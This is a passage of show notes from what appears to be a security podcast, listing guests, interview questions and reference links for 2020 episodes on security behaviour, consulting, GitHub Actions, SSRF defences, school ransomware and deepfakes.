Tmux/screen sessions
Application secrets (database files, web files with database connectivity, hard coded creds or keys, etc)
VPN profiles
GNOME keyrings - https://askubuntu.com/questions/96798/where-does-seahorse-gnome-keyring-store-its-keyrings
Ways to defend against those kinds of EoP.
Something cool: https://www.youtube.com/playlist?playnext=1&list=PLnxNbFdr_l6sO6vR6Vx8sAJZKpgKtWaGX&feature=gws_kp_artist -- High Rollers
Derek is speaking at SANS SUMMIT happening on 04-05 June (FREE!) - https://www.sans.org/event/hackfest-ranges-summit-2020
Ms. Berlin is speaking at EDUCAUSE - VIRTUAL (04 June) https://www.educause.edu/
2020-020-Andrew Shikiar - FIDO Alliance - making Cybersecurity more secure
2020-019-Masha Sedova, customized training, phishing, ransomware, and privacy implications
Guest: Masha Sedova, founder, Elevate Security

Topic ideas from the PR company:

Inability to measure human security behaviors leads to increased risk in our computing environments. For too long, we've accepted training completion and mock-phishing data as a sufficient way to measure this risk. But where do the vulnerabilities and strengths truly lie? The secret is that security teams have installed tons of security tooling that can give insights into how our employees are behaving, but we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this newfound knowledge. (Technology like vuln scanners, or something more?)

Study after study shows that the reason people don't do things is not always that they don't understand; it's that they are not motivated. Motivating employees to change their cybersecurity behavior can seem like an overwhelming task, but there are simple behavioral science techniques cybersecurity professionals can leverage to motivate employees to do the right thing. Masha Sedova will discuss the power of integrating elements of behavioral science into security in order to influence positive behavior.

Motivation theory:
- Deming: https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles
- Theory X and Theory Y: https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y
- Ouchi's Theory Z: https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi
- http://www.yourarticlelibrary.com/motivation/motivation-theories-top-8-theories-of-motivation-explained/35377

Masha's suggested topics:
- Why do security teams have difficulty understanding their human risk today? What are the blockers?
- What should security teams be measuring to get a holistic view of human risk?
- What's the difference between security culture, security behavior change, and security awareness?
- Is security culture a core capability in security defense? Why or why not?
- Quantifying risk…
- Is investing in human training a waste of time?

Discussion notes:
- Phishing: mock phish or real phishing. Pull data to see who is clicking on links, then send an "intervention".
- Gotta move away from training. The "security team" will save them…
- https://www.ncsc.gov.uk/guidance/phishing

Books:
- Nudge: https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X
- Drive: https://www.amazon.com/Drive-Surprising-Truth-About-Motivates/dp/1594484805/ref=sr_1_1?crid=2QQ59YRRU89YX&dchild=1&keywords=drive+daniel+pink&qid=1588733551&s=books&sprefix=drive%2Cstripbooks%2C240&sr=1-1
- Reality Is Broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611
- People-Centric Security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1
- Deep Thought: a cybersecurity novella: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/

Elevate Security: https://elevatesecurity.com/ and @modmasha
2020-018- Masha Sedova, bespoke security training, useful metrics to tailor training
Show notes for this episode are the same as for 2020-019 above.
2020-017-Cameron Smith, business decisions, and how it affects Security
Guest: Cameron Smith (@Secnomancer, www.twitter.com/secnomancer). Cybersmith.com, up by 14 April. [email protected] [email protected]

Links:
- Layer 8 Conference is virtual: https://layer8conference.com/layer-8-is-online-this-year/
- NIST SP 800-171 Rev. 1: https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
- CMMC: https://info.summit7systems.com/blog/cmmc
- CompTIA Project+: https://www.comptia.org/certifications/project
- Chris Voss: https://en.wikipedia.org/wiki/Christopher_Voss
- Never Split the Difference: https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805
- https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation and https://www.masterclass.com/
- Free Autopsy training during COVID-19: https://www.autopsy.com/support/training/covid-19-free-autopsy-training/
- https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ

"There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self." (Ernest Hemingway) https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellow

Original B-Sides talk blurb

SITREP: A Consultant's Perspective from the Trenches of InfoSec

In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better.

Speaking goal

After my presentation is over, I want my audience to...
- Feel better about where they are as an infosec practitioner
- Understand that most of cybersecurity is largely NOT about the latest hack or technique
- Failing is OK as long as you learn from it
...so that...
- When they go back to their office / SOC / client engagements on Monday they focus on the things that matter to their organizations
- Hopefully feel a little bit less that the work they are doing is boring, exhausting, unappreciated, or hopeless

Intro
- Security is a really crazy industry
  - Like the wild west out here
  - Constant threats
  - Complacent or ignorant clients/dependents
  - Resource and budget constraints
- Security is really complex
  - There are SO. MANY. MOVING. PIECES.
  - There is a never-ending stream of new information to learn and new threats to face
  - Security always involves at LEAST 4 parts:
    - The practitioner (hopefully you have backup!)
    - What you're protecting: employer, client, system, application, data, SOMETHING, etc.
    - What you're protecting it from: external TAs, internal TAs, incompetence, apathy, plain ol' vanilla constraints, etc.
    - What you have to protect it with: budgets, time, personnel, training, relationships, etc.
- Cybersecurity/information security is simultaneously an old and a new/emergent discipline
  - Cyber history, old:
    - Nevil Maskelyne / Guglielmo Marconi wireless telegraphy attack and Morse code insults, 1903
    - Phreaking in the 1960s
    - ARPANET Creeper, 1971
    - Morris Worm, 1988
  - New:
    - Gartner coined the term SOAR in 2017. Yeah... it's barely 3 years old. Now you can literally find job openings with SOAR Engineering titles.
    - DevSecOps: Amazon presentation in 2015? Not even in grade school yet.
    - Average enterprise is running 75 security tools in their environment (Cybersecurity Almanac 2019)
    - Most cybersecurity professionals over 30 do not have degrees in cybersecurity; many don't even have Computer Science or IT-related degrees
      - This is its own problem: training cyber pros, Chris Sanders, cognitive crisis, etc. (BDS ep 2019-021 and 2019-022)
  - Emergent disciplines are challenging by default. You chose to play the game on hard mode for your first play-through.
- Security really isn't as complicated as most people think
  - Occult phenomenon: things we don't understand we imagine to be far more complex; things we anticipate we imagine to be far worse than they are
  - Grass isn't greener: most security departments aren't doing better than you are; maturity models aren't magic

Establish credibility
- I have been in A LOT of client environments in the last 12 years
- Last time I checked, I have more than 350 discrete client engagements under my belt
- I have worked with hundreds of internal, external, and hybrid IT and security solutions
- I've met the same tired and beleaguered IT/security personnel over and over again. SSDD, very little actually changes from place to place.
- In that time, I've learned quite a bit about what makes security work
- I've learned even more about what NOT to do
- I want to share some of that with you today so you can see how organizations of all shapes and sizes can fail

Very large company examples
- Big Four bank example
  - Situation: four local branches in the Midwest; physical security assessment
  - How we got onto site as a cash machine servicer was incredibly easy
  - Problem: absolute trust of vendors / vendor compromise
  - How do we as security practitioners fix it? Good internal relationships with functional are
2020-016-Cameron Smith, Business decisions and their (in)secure outcomes - Part 1
Show notes for this episode are the same as for 2020-017 above.
2020-015-Tanya Janca, using GitHub Actions in your DevOps environment, workflow automation
Guest: Tanya Janca (@shehackspurple)

GitHub Actions: https://github.com/features/actions
- How are these written? It looks like a marketplace format?
- How do they maintain code quality?
- What does it take to set up the actions?
- It looks like IFTTT for DevOps?
- What kind of integrations does it allow for? Will it handle logins or API calls for you?
- Is it moderated in some way? What's the acceptance criteria for these?
- What are you trying to accomplish by using GitHub Actions? What are the benefits of using these over XX product? What is gained by using this?

Mention the Twitch channel and when (join the mailing list): GitHub Actions on Twitch.tv/shehackspurple

Coaching, project management, Scrum management

Alice and Bob Learn Application Security (Wiley), Fall/Winter 2020

Links:
- https://shehackspurple.dev
- https://mailchi.mp/e2ab45528831/shehackspurple
- https://twitter.com/shehackspurple
- https://dev.to/shehackspurple
- https://medium.com/@shehackspurple
- https://www.youtube.com/shehackspurple
- https://www.twitch.tv/shehackspurple
- https://www.linkedin.com/in/tanya-janca
- https://github.com/shehackspurple/
2020-014-Server Side Request Forgery defense, Tanya Janca, AppSec discussion
Guest: Tanya Janca, https://SheHacksPurple.dev

Tanya's AppSec course: https://www.shehackspurple.dev/server-side-request-forgery-ssrf-defenses and https://www.shehackspurple.dev

Server-side request forgery: https://portswigger.net/web-security/ssrf
- What are the differences between stored XSS and SSRF? Does this require a MITM type of issue? Doesn't stored XSS get stored on the server?
- What conditions must exist for SSRF to be possible?
- What mitigations need to be in place to mitigate SSRF? CORS? CSP? Would a WAF or mod_security be effective?
- Can it be completely mitigated, or are there still ways around it?

Part 2, next week: GitHub Actions (the questions are listed in the show notes for episode 2020-015 above).

Links:
- https://shehackspurple.dev
- https://mailchi.mp/e2ab45528831/shehackspurple
- https://twitter.com/shehackspurple
- https://dev.to/shehackspurple
- https://medium.com/@shehackspurple
- https://www.youtube.com/shehackspurple
- https://www.twitch.tv/shehackspurple
- https://www.linkedin.com/in/tanya-janca
- https://github.com/shehackspurple/
2020-013- Part 2, education security, ransomware, April Mardock, Nathan McNulty, and Jared Folkins
Guests:
- April Mardock, CISO, Seattle Public Schools
- Jared Folkins, IT Engineer, Bend-La Pine Schools
- Nathan McNulty, Information Security Architect, Beaverton School District

Security persons at education institutions of varying sizes.

Links:
- OpSecEdu (Slack): https://www.opsecedu.com/
- https://www.a4l.org/default.aspx
- https://clever.com/
- BEC: https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
- https://www.k12cybersecurityconference.org/
- https://acpenw.sched.com/

Bypassing security controls:
- https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
- https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters
- https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
- https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
- https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/

Ransomware in schools:
- https://www.darkreading.com/threat-intelligence/ransomware-crisis-in-us-schools-more-than-1000-hit-so-far-in-2019/d/d-id/1336634
- https://www.forbes.com/sites/leemathews/2019/09/25/yet-another-u-s-school-district-has-been-ravaged-by-malware/
- https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/

Questions:
- Why are schools soft targets? Is money/budget the reason schools get the raw deal here?
- Why is ransomware such an appealing attack?
- How complex is the school environment? Mobile, tablets, hostile users, hostile external forces.
- Adding technology too quickly? Outpacing the infrastructure in schools?
- (Just ideas for some questions. - Jared)
- Do you find vendors are very responsive in the education space when receiving a vulnerability report? https://www.edweek.org/ew/articles/2019/09/10/parent-who-criticized-his-sons-math-program.html
- When students, who you are trying to educate, are found doing something inappropriate, how do districts handle it? https://ktvz.com/news/2017/11/08/mtn-view-hs-bomb-threat-traced-to-eugene-14-year-old/
- What challenges do security people in education face when partnering with their user base?
- Unlike a corporate setting, many educators and students need to install different software throughout the year; how is that handled?
- How did April, Nathan, and Jared meet?
- Has the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud-based, or do you still have an IT shack at the school systems with physical machines?
- Local admins are not granted… (excellent!)
2020-012-April Mardock, Nathan McNulty, Jared Folkins, school security, ransomware attacks
Show notes for this episode are the same as for 2020-013 above.
2020-011-Alyssa Miller, deep fakes, threat modeling for DevOps environments, and virtual conferences
Guest: Alyssa Miller (@AlyssaM_InfoSec)

https://twitter.com/AlyssaM_InfoSec/status/1159877471161839617?s=19: "Looking forward to sharing my vision for ending the 60 year cycle of bad defense strategies in #infosec and my challenge to think about security in a more effective way. https://sched.co/TAqU @dianainitiative #DianaInitiative2019 #cdwsocial @CDWCorp"

Defense strategy:
- 1961, MIT, CTSS: https://en.wikipedia.org/wiki/Compatible_Time-Sharing_System
- Egg, coconut, brick (my example of security --brbr)
- Start with critical assets. Layer outward, not perimeter in.
- Medieval castles: create the keep, build out from that. Dover Castle: https://en.wikipedia.org/wiki/Dover_Castle#/media/File:1_dover_castle_aerial_panorama_2017.jpg
  - Active defenses
  - Detection defenses: watchguards
  - Mitigation defenses: moats give time/space to respond (network segmentation)
  - Active countermeasures: knights/archers/cannons

Deepfake technology:
- Election year. Spoke at RSA.
- Business threat? "Outsider trading": "Video of Elon talking about problems - fake…", stocks tank, short. https://www.vice.com/en_us/article/ywyxex/deepfake-of-mark-zuckerberg-facebook-fake-video-policy
- Could it be done strategically to destabilize things?
- Extort business leaders: fake videos used to extort
- Still difficult to create. What are the hurdles stopping it from being mainstream? Huge render farms?
- Deepfake Sharon Stone / Steve Buscemi: https://www.youtube.com/watch?v=18LN7VQM1aw

Threat modeling in DevSecOps:
- Agile environments need to be quick and fast, and build it into user stories
- Shostack's method is a bit weighty
- How do we implement that in such a way as to make devs want to do it?

Organizing virtual cons:
- https://Allthetalks.online, April 15: a 24-hour conference for charity. Talks, followed by interactive channels, community generation, virtual Lobbycon, comedian. CFP is open 01 April 2020. Sticker swap!
- BSides Atlanta, 27-29 March: https://bsidesatl.org/ (all virtual this weekend!)
- Infosec Oasis, 18 April: https://Infosecoasis.com

Zoom privacy and security:
- https://mashable.com/article/zoom-conference-call-work-from-home-privacy-concerns/
- https://www.theverge.com/2019/7/10/20689644/apple-zoom-web-server-automatic-removal-silent-update-webcam-vulnerability